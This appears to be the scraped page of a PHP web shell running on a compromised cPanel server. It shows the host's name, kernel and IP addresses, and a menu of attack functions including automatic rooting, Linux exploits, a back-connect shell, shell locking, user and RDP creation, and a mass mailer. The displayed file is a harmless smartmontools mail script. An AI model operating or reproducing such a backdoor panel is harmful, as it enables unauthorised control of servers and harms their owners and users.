Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.7.60
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
smartmontools /
run.d /
[ HOME SHELL ]
Name
Size
Permission
Action
10mail
231
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 10mail
#!/bin/bash -e # Send mail if /usr/bin/mail exists if ! [ -x /usr/bin/mail ]; then echo "Your system does not have /usr/bin/mail. Install the mailx or mailutils package" exit 1 fi input=$1 shift /usr/bin/mail "$@" < $input
Close